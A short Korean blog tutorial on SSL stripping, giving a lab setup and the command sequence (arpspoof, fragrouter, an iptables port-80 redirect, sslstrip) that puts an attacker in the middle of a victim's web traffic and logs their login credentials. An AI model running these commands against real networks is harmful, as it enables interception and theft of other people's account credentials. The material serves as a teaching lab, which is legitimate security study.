Simple is IT, 누구나 보고 누구나 깨닫는 IT

SSL Strip 본문

Simple is IT/Network

SSL Strip

currenjin 2020. 4. 27. 10:15
SSL ?
: 전송계층의 보안 프로토콜이다. (HTTP 통신을 암호화하는데 사용)

SSL Strip
: MITM 공격을 수행하고 있을 때 Hacker - Target = http 통신, Web - Hacker = https 통신하며 접속 허용, 비정상 통신 수행



Hacker
192.168.10.6 (Kali Linux)
Target
192.168.10.8 (Windows XP)
Gateway
192.168.10.2

Hacker
# arpspoof -t 192.168.10.2 192.168.10.8
# arpspoof -t 192.168.10.8 192.168.10.2
# fragrouter -B1

# apt-get install iptables -y
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# iptables-save
# sslstrip -l 10000 -w ssl.log
# netstat -anlp | grep 10000



Target의 환경에서 웹에 접속해 로그인을 시도해보면 Log파일에 계정 정보가 기록이 된다.




Comments